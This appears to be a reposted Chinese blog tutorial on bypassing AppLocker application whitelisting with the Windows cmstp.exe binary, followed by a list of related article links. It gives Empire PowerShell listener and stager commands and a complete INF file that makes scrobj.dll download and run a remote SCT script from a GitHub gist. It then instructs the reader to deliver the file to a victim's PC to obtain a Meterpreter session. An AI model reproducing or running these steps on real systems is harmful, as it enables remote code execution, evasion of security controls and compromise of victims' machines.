使用cmstp绕过应用程序白名单
应用程序 绕过 白名单 使用
2023-09-14 09:00:03 时间
默认情况下,AppLocker允许在文件夹中执行二进制文件,这是可以绕过它的主要原因。已经发现,这样的二进制文件可以很容易地用于绕过AppLocker和UAC。与Microsoft相关的二进制文件之一是CMSTP。CMSTP welcomes INF文件,因此通过INF进行开发是可能的。因此,我们将学习如何进行此类开发。
众所周知,CMSTP接受SCT文件,然后无提示地运行,因此我们将创建一个恶意的SCT文件以实现我们的目标。为此,我们将使用Empire PowerShell。有关Empire PowerShell的详细指南,请单击此处。
从Kali终端启动Empire框架,然后输入以下命令以创建恶意软件:
listeners uselistener http set Host 192.168.1.109 execute
上面的命令将为您创建一个侦听器,然后键入back以从侦听器接口返回,并且创建SCT文件类型:
usestager windows/launcher_sct set Listener HTTP execute
运行上述漏洞将创建SCT文件。我们将使用以下脚本在PowerShell中执行文件。在此脚本中,给出SCT文件的路径,并添加以下代码,如图所示:
从这里下载此脚本:
;cmstp.exe /s cmstp.inf [version] Signature=$chicago$ AdvancedINF=2.5 [DefaultInstall_SingleUser] UnRegisterOCXs=UnRegisterOCXSection [UnRegisterOCXSection] %11%\scrobj.dll,NI,https://gist.githubusercontent.com/NickTyrer/0604bb9d7bcfef9e0cf82c28a7b76f0f/raw/676451571c203303a95b95fcb29c8b7deb8a66e0/powersct.sct [Strings] AppAct = "SOFTWARE\Microsoft\Connection Manager" ServiceName="Yay" ShortSvcName="Yay"
现在,将文件发送到受害者的PC,并在受害者的命令提示符下运行以下命令:
cmstp.exe /s shell.inf
一旦运行该命令,您将获得一个meterprer会话。使用以下命令访问会话:
interact <session name>
这样,您可以使用CMSTP二进制文件来绕过applocker限制。CMSTP需要一个INF文件,并且利用它可以帮助您访问受害者的PC。
相关文章
- 获取应用程序所在目录
- 使用msiexec.exe绕过应用程序白名单(多种方法)
- 使用regsrv32.exe绕过应用程序白名单(多种方法)
- 应用程序进程启动过程
- Linux自定义应用程序及其菜单图标
- Java //PP2.3 编写一个应用程序,输出提示信息并读入某人的姓名、年龄、所属学院和宠物的名字,然后显示出下述文字,并在其中插入适当的数据: Hello, my name is name...
- 应用程序无法正常启动的一种解决方法
- 给android应用程序系统的签名
- 启动另一个Activity、Service、应用程序
- 4安德鲁斯.2.2在系统,具有系统权限的应用程序无法读取或写入SD卡
- VC++使用URI Scheme实现从web网页上打开本地C++应用程序(附源码)
- ASP.NET MVC3 Web应用程序中启用GZip压缩示例
- Zookeeper 应用程序
- 【构建ML驱动的应用程序】第 3 章 :构建您的第一个端到端管道
- 【构建ML驱动的应用程序】第 2 章 :制定计划
- Visual C++ 2008 Express Edition开发SDK应用程序